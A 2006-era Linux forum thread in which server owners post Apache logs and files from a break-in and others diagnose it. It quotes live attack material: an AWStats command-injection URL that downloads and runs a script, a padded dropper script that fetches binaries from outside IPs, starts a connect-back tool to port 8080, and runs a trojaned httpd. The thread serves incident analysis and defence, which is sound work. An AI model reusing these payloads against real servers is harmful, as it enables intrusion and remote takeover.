# Attempted hack?

## quijibo

I ran the last update and tried to get the PHP working under the new method.  (dev-lang/php)  I got it all upgraded and everything seemed to work fine with the exception that I couldn't get the postnuke script to run.  However, the installer, squirrelmail, etc works fine.  Anyways, that is a different issue unrelated to this I hope.  But in an attempt to figure out why that wasn't working and looking through the error_log I did find this very strange looking error.

```
--08:17:18--  http://211.234.113.241/scripz

           => `scripz'

Connecting to 211.234.113.241:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 299 [text/plain]

    0K                                                       100%

08:17:18 (25.92 MB/s) - `scripz' saved [299/299]

--08:17:18--  http://219.84.105.36/ping

           => `ping'

Connecting to 219.84.105.36:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 11,145 (11K) [text/plain]

    0K ..[Sat Feb 11 08:17:18 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/blog

........                                            100% 38.3K

08:17:18 (38.29 KB/s) - `ping' saved [11145/11145]

lordnikonz: no process killed

--08:17:18--  http://219.84.105.36/httpd

           => `httpd'

Connecting to 219.84.105.36:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 400,492 (391K) [text/plain]

    0K .......... .......... .........[Sat Feb 11 08:17:19 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/blog

. .......... .......... 12% 43.5K   0:07

   50K .......... .......... .......... ...[Sat Feb 11 08:17:20 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/blogs

....... .......... 25% 46.5K   0:06

  100K .......... .......... .......... ......[Sat Feb 11 08:17:21 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/drupal

.... .......... 38% 43.5K   0:05

  150K .......... .......... .......... ....[Sat Feb 11 08:17:23 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/phpgroupware

...... .......... 51% 41.2K   0:04

  200K .......... .......... ..........[Sat Feb 11 08:17:24 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/wordpress

 .......... .......... 63% 40.3K   0:03

  250K .......... .......... ..........--08:17:25--  http://211.234.113.241/scripz

           => `scripz.1'

Connecting to 211.234.113.241:80...  ..connected.

HTTP request sent, awaiting response... ..200 OK

Length: 299 [text/plain]

    0K                                                       100%

08:17:25 (57.03 MB/s) - `scripz.1' saved [299/299]

mkdir: cannot create directory `.a': File exists

--08:17:25--  http://219.84.105.36/ping

           => `ping'

Connecting to 219.84.105.36:80... ...... .......... 76% 38.0K   0:02

  300K .......... .......... ..[Sat Feb 11 08:17:26 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/xmlrpc

........ .........connected.

HTTP request sent, awaiting response... . .......... 89% 42.5K

  350K .......... .......... .[Sat Feb 11 08:17:27 2006] [error] [client 67.19.153.84] File does not exist: /var/www/localhost/htdocs/xmlsrv

......... .......... .         100% 40.3K

08:17:28 (41.85 KB/s) - `httpd' saved [400492/400492]

200 OK

Length: 11,145 (11K) [text/plain]

    0K ..........                                            100% 14.3K

08:17:29 (14.29 KB/s) - `ping' saved [11145/11145]

lordnikonz: no process killed

--08:17:29--  http://219.84.105.36/httpd

           => `httpd.1'

Connecting to 219.84.105.36:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 400,492 (391K) [text/plain]

    0K .......... .......... .......... .......... .......... 12% 42.2K   0:08

   50K .......... .......... .......... .......... .......... 25% 44.2K   0:06

  100K .......... .......... .......... .......... .......... 38% 43.0K   0:05

  150K .......... .......... .......... .......... .......... 51% 42.2K   0:04

  200K .......... .......... .......... .......... .......... 63% 43.2K   0:03

  250K .......... .......... .......... .......... .......... 76% 38.7K   0:02

  300K .......... .......... .......... .......... .......... 89% 40.9K   0:01

  350K .......... .......... .......... .......... .         100% 39.8K

08:17:38 (41.74 KB/s) - `httpd.1' saved [400492/400492]

[Sat Feb 11 09:30:20 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/awstats

[Sat Feb 11 09:30:22 2006] [error] [client 160.99.12.231] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl

[Sat Feb 11 09:30:23 2006] [error] [client 160.99.12.231] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats

--09:30:26--  http://211.234.113.241/scripz

           => `scripz.2'

Connecting to 211.234.113.241:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 299 [text/plain]

    0K                                                       100%

09:30:26 (20.37 MB/s) - `scripz.2' saved [299/299]

mkdir: cannot create directory `.a': File exists

--09:30:26--  http://219.84.105.36/ping

           => `ping'

Connecting to 219.84.105.36:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 11,145 (11K) [text/plain]

    0K ..........                                            100% 43.9K

09:30:27 (43.80 KB/s) - `ping' saved [11145/11145]

lordnikonz: no process killed

--09:30:27--  http://219.84.105.36/httpd

           => `httpd.2'

Connecting to 219.84.105.36:80... connected.

HTTP request sent, awaiting response... [Sat Feb 11 09:30:27 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/blog

200 OK

Length: 400,492 (391K) [text/plain]

    0K .......... .......... .......... .......... .......... 12% 46.6K   0:07

   50K .........[Sat Feb 11 09:30:28 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/blog

. .......... .......... .......... .......... 25% 46.4K   0:06

  100K .......... ........[Sat Feb 11 09:30:29 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/blogs

.. .......... .......... .......... 38% 42.7K   0:05

  150K .......... ..........[Sat Feb 11 09:30:31 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/drupal

 .......... .......... .......... 51% 36.7K   0:05

  200K .......... .......... ....[Sat Feb 11 09:30:32 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/phpgroupware

...... .......... .......... 63% 37.2K   0:03

  250K .......... .......... .....[Sat Feb 11 09:30:34 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/wordpress

..... .......... .......... 76% 40.5K   0:02

  300K .......... .......... .......... ...--09:30:35--  http://211.234.113.241/scripz

           => `scripz.3'

Connecting to 211.234.113.241:80... ...connected.

HTTP request sent, awaiting response... 200 OK

Length: 299 [text/plain]

```

And etc...   it goes up to xxxx.5  I turned off apache for right now, but is this due to my part of not securing apache, or enabling some feature that I shouln't have, or something more?   Currently I am running apache like this:

[ebuild   R   ] net-www/apache-2.0.55-r1  +apache2 -debug -doc -ldap -mpm-leader -mpm-peruser +mpm-prefork -mpm-threadpool -mpm-worker -no-suexec (-selinux) +ssl -static-modules +threads 0 kB

I had to enable one of the mpm so it would correctly with the new way of how PHP is used now.  Anyways, going to the files that were somehow uploaded onto my machine I got this:

```

#!/bin/bash

(about 100 lines of blank text here to hide what was below)

cd /tmp

mkdir .a

cd .a

wget 219.84.105.36/ping

mv ping cb

chmod +x cb

./cb 210.245.233.251 8080 &

killall -9 lordnikonz

wget 219.84.105.36/httpd

chmod +x httpd

rm -rf scripz

export PATH="."

httpd

```

Going to that directory I got this:

```

.a # ls -al

total 2408

drwxr-xr-x   2 apache apache   4096 Feb 11 10:52 .

drwxrwxrwt  11 root   root    12288 Feb 11 12:34 ..

-rwxr-xr-x   1 apache apache  11145 Jan 14 21:52 cb

-rwxr-xr-x   1 apache apache 400492 Feb  5 23:10 httpd

-rw-r--r--   1 apache apache 400492 Feb  5 23:10 httpd.1

-rw-r--r--   1 apache apache 400492 Feb  5 23:10 httpd.2

-rw-r--r--   1 apache apache 400492 Feb  5 23:10 httpd.3

-rw-r--r--   1 apache apache 400492 Feb  5 23:10 httpd.4

-rw-r--r--   1 apache apache 400492 Feb  5 23:10 httpd.5

-rw-r--r--   1 apache apache   1311 Feb 11 10:52 listen.log

```

And a cat of the listen.log reveals:

```

.a # cat listen.log

11/01 08:17:28 [26284] [26304] =========================

11/01 08:17:28 [26284] [26304] starting server build 578

11/01 08:17:28 [26284] [26304] WARNING no internet routeable ips found

11/01 08:17:28 [26284] [26304] all ok until now going background

11/01 08:17:28 [1] [26306] demonized

11/01 08:17:38 [26299] [26317] =========================

11/01 08:17:38 [26299] [26317] starting server build 578

11/01 08:17:38 [26299] [26317] [FATAL] unable to bind port, errno=98, Address already in use

11/01 09:30:37 [31795] [31813] =========================

11/01 09:30:37 [31795] [31813] starting server build 578

11/01 09:30:37 [31795] [31813] [FATAL] unable to bind port, errno=98, Address already in use

11/01 09:30:47 [31808] [31822] =========================

11/01 09:30:47 [31808] [31822] starting server build 578

11/01 09:30:47 [31808] [31822] [FATAL] unable to bind port, errno=98, Address already in use

11/01 10:52:29 [5166] [5186] =========================

11/01 10:52:29 [5166] [5186] starting server build 578

11/01 10:52:29 [5166] [5186] [FATAL] unable to bind port, errno=98, Address already in use

11/01 10:52:39 [5180] [5195] =========================

11/01 10:52:39 [5180] [5195] starting server build 578

11/01 10:52:39 [5180] [5195] [FATAL] unable to bind port, errno=98, Address already in use

```

So whatever this person in Taiwan (from a traceroute) was trying to do failed *thankfully*.  The two files that it tried to put on were some binary files that I can't make out, but in the end of the httpd one it did have this:

GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-42)^@^@GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-42)^@^@GCC: (GNU) 3.2.3 2003 20030502 (Red Hat Linux 3.2.3-49)^@^@GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-49)^@^@GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-49)^@^@GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-49)^@^@GCC: (GNU) 3.2.3 20030502 (Red Hat) ....  you get the idea

I know I haven't locked down my network as well as it could be, but is it a problem because of that or a setting or a bug or what?  Please forgive me if this is a stupid question, but I don't have anyone to ask around where I am at.  

Oh here is the pertinant access_log stuff as well, and as you can see at the end someone was trying to do something yet again before I shutdown apache.  The kind of mind scratching thing here is though, is why were the same attacks coming from two completely different IPs?

```

61.92.23.173 - - [11/Feb/2006:05:13:36 +0900] "GET / HTTP/1.1" 404 142

222.235.161.34 - - [11/Feb/2006:05:19:34 +0900] "GET / HTTP/1.1" 404 142

67.19.153.84 - - [11/Feb/2006:08:17:12 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279

67.19.153.84 - - [11/Feb/2006:08:17:13 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279

67.19.153.84 - - [11/Feb/2006:08:17:15 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 287

67.19.153.84 - - [11/Feb/2006:08:17:17 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 276

67.19.153.84 - - [11/Feb/2006:08:17:18 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 283

67.19.153.84 - - [11/Feb/2006:08:17:19 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 284

67.19.153.84 - - [11/Feb/2006:08:17:20 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 278

67.19.153.84 - - [11/Feb/2006:08:17:22 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 284

67.19.153.84 - - [11/Feb/2006:08:17:23 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 281

67.19.153.84 - - [11/Feb/2006:08:17:25 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 278

67.19.153.84 - - [11/Feb/2006:08:17:26 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 278

160.99.12.231 - - [11/Feb/2006:09:30:20 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279

160.99.12.231 - - [11/Feb/2006:09:30:22 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279

160.99.12.231 - - [11/Feb/2006:09:30:23 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 287

160.99.12.231 - - [11/Feb/2006:09:30:26 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 276

160.99.12.231 - - [11/Feb/2006:09:30:27 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 283

160.99.12.231 - - [11/Feb/2006:09:30:28 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 284

160.99.12.231 - - [11/Feb/2006:09:30:30 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 278

160.99.12.231 - - [11/Feb/2006:09:30:31 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 284

160.99.12.231 - - [11/Feb/2006:09:30:32 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 281

160.99.12.231 - - [11/Feb/2006:09:30:35 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 278

160.99.12.231 - - [11/Feb/2006:09:30:37 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 278

211.214.161.139 - - [11/Feb/2006:10:52:14 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279

211.214.161.139 - - [11/Feb/2006:10:52:16 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279

211.214.161.139 - - [11/Feb/2006:10:52:17 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 287

211.214.161.139 - - [11/Feb/2006:10:52:19 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 276

211.214.161.139 - - [11/Feb/2006:10:52:20 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 283

211.214.161.139 - - [11/Feb/2006:10:52:21 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 284

211.214.161.139 - - [11/Feb/2006:10:52:22 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 278

211.214.161.139 - - [11/Feb/2006:10:52:23 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 284

211.214.161.139 - - [11/Feb/2006:10:52:24 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 281

211.214.161.139 - - [11/Feb/2006:10:52:26 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 278

211.214.161.139 - - [11/Feb/2006:10:52:27 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 278

220.167.25.2 - - [11/Feb/2006:11:40:49 +0900] "GET / HTTP/1.1" 404 142

65.102.23.161 - - [11/Feb/2006:12:04:53 +0900] "GET / HTTP/1.0" 404 142

```

Sorry for the long post, but I hope this is all of the correct information.  Thanks in advance.

----------

## Belandrew

What you are seeing in the logs is one person who has gained access to your system and is uploading stuff to it, mixed in with error messages from other people/bots trying standard PHP exploit attempts that are failing. They are mixed together in such a strange way because they're coming from different unsynchronized sources, probably apache itself and another program that the attacker is running that happens to also be sending its messages to the apache error_log. I would not trust your logs if they weren't being sent to another machine. I would also not trust the system any more at this point, since someone uploading and executing things means the system is compromised. Although it does look like the one script failed due to being badly written, there's no way to be sure what else happened since someone with access can also alter the logs. I would wipe the drive and reinstall from safe media. It's the only way to be sure you have a clean system.

What caused it? My guess would be an outdated php script hole, but it's just that - a guess. PHP exploits are pretty common these days, which is why you see a bunch of attempts at exploiting xmlrpc.php in various places in the logs. I can't see any actual compromise happening in the logs you've listed, but obviously uploading and executing of code was occurring.

----------

## hanj

 *Quote:*   

> What caused it? My guess would be an outdated php script hole, but it's just that - a guess. PHP exploits are pretty common these days, which is why you see a bunch of attempts at exploiting xmlrpc.php in various places in the logs. I can't see any actual compromise happening in the logs you've listed, but obviously uploading and executing of code was occurring.

 

This is what started it off... awstats vulnerability. What version of awstats are you running?

```

61.92.23.173 - - [11/Feb/2006:05:13:36 +0900] "GET / HTTP/1.1" 404 142

222.235.161.34 - - [11/Feb/2006:05:19:34 +0900] "GET / HTTP/1.1" 404 142

67.19.153.84 - - [11/Feb/2006:08:17:12 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279

67.19.153.84 - - [11/Feb/2006:08:17:13 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279

67.19.153.84 - - [11/Feb/2006:08:17:15 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  
```

hanji

----------

## nms

404 errors usually indicate that a requested document, file or script is missing:

```
61.92.23.173 - - [11/Feb/2006:05:13:36 +0900] "GET / HTTP/1.1" 404 142

222.235.161.34 - - [11/Feb/2006:05:19:34 +0900] "GET / HTTP/1.1" 404 142

67.19.153.84 - - [11/Feb/2006:08:17:12 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279

67.19.153.84 - - [11/Feb/2006:08:17:13 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 279
```

Server side errors also confirm this:

```
[Sat Feb 11 09:30:20 2006] [error] [client 160.99.12.231] File does not exist: /var/www/localhost/htdocs/awstats

[Sat Feb 11 09:30:22 2006] [error] [client 160.99.12.231] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl

[Sat Feb 11 09:30:23 2006] [error] [client 160.99.12.231] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats
```

----------

## hanj

Ah.. I glazed right over the 404. I'm wondering if it's one of the POSTs.. since it appears that scripz was uploaded to the server.

hanji

----------

## Belandrew

 *hanj wrote:*   

> Ah.. I glazed right over the 404. I'm wondering if it's one of the POSTs.. since it appears that scripz was uploaded to the server.
> 
> hanji

 

The "upload" output you see in the logs is consistent with that of wget downloading, though broken up with regular error messages from apache, and also the automatic renaming if you try to download the same file more than once. At that point, the system has already been compromized and the attacker is just downloading his/her extra toys - a trojaned httpd replacement among others.

```

~ # wget 192.168.0.111/index.html

--22:54:33--  http://192.168.0.111/index.html

           => `index.html.1'

Connecting to 192.168.0.111:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 342 [text/html]

100%[====================================>] 342           --.--K/s

22:54:33 (18.12 MB/s) - `index.html.1' saved [342/342]

```

----------

## Johnyp

I had similar hack ran against my machine. It turned out to be an xmlrppc file in drupal install. Most php apps had this vurnability.

Check all of your web-apps to make sure they are pached up, all files are secured and no xmlrpc exploits are known for your versions.

----------

## quijibo

I just went ahead and reinstalled the system for now.  I wanted to do this anyways since the last time I installed Gentoo on this was with the 2004.3 install.  After upgrading it so many times it was doing some strange things, like proftpd crashing for no apparent reason.  Most of the system is back up and running now, but I can't get postnuke to run properly so I don't keep apache open for very long until I can figure out why I am getting PHP problems with the scrips running.  The strange thing is, is that the installer for postnuke (.761) seems to work fine...  :Shocked: 

----------

## fidel

I got a similar problem, is there a way to find out, where the security hole lies?.. The log file from apache (error_log) shows the following entry:

```
--07:20:06--  http://81.58.26.26/libsh/ping.txt

           => `ping.txt'

Connecting to 81.58.26.26:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 358 [text/plain]

    0K                                                       100% 

07:20:06 (18.97 MB/s) - `ping.txt' saved [358/358]

--07:20:06--  http://81.58.26.26/libsh/ping

           => `ping'

Connecting to 81.58.26.26:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 15,808 (15K) [text/plain]

    0K .......... .....                                      100% 26.5K       

07:20:08 (26.51 KB/s) - `ping' saved [15808/15808]

chmod: invalid mode string: `x'

sh: ./ping: Permission denied

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current

                                 Dload  Upload   Total   Spent    Left  Speed

  6 15808    6  1169    0     0   4683      0  0:00:03 --:--:--  0:00:03  4683

 53 15808   53  8409    0     0  12849      0  0:00:01 --:--:--  0:00:01 17876

100 15808  100 15808    0     0  16372      0 --:--:-- --:--:-- --:--:-- 20445

chmod: invalid mode string: `x'

sh: ./ping: Permission denied

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current

                                 Dload  Upload   Total   Spent    Left  Speed

100   358  100   358    0     0   2841      0 --:--:-- --:--:-- --:--:--  2841

100   358  100   358    0     0   2834      0 --:--:-- --:--:-- --:--:--     0

[Fri Apr 21 11:08:28 2006] [error] cgid daemon process died, restarting

```

The entire system died three days ago and a fresh reinstall can't easily be done, the server is situated in a computer center...

Unfortunately in the access_log I can't find anything related to this....

How do I have to interpret this entry, is it that anyone gained access to the machine by gaining control over apache?... So at least there is no way for the hacker to gain access to ssh!?

Thanks in advance!!!

greets

----------

## lesourbe

I ain't an expert but...

upload, chmod +x uploaded_file, sh uploaded file...

It seems that chmod and sh both failed, but is it an output of the script that we see ?

If it is, and if apache is run by root, you can trust anymore your system.

----------

## fidel

It's the entry in my log file:

/var/log/apache2/error_log

And apache is run as apache:apache. I don't trust my system anymore, until I found the security hole.. If someone tricked the system by using a security hole in let's say, horde... I would install a new version of horde and check no "poison" is left on the system... If I couldn't find out about the security hole, I wouldn't have an alternative to reinstalling everything..   :Crying or Very sad: 

But I just don't get a clue how to find out, how the hacker got into the system... If I would be able to find out, I see chances in fixing it...

----------

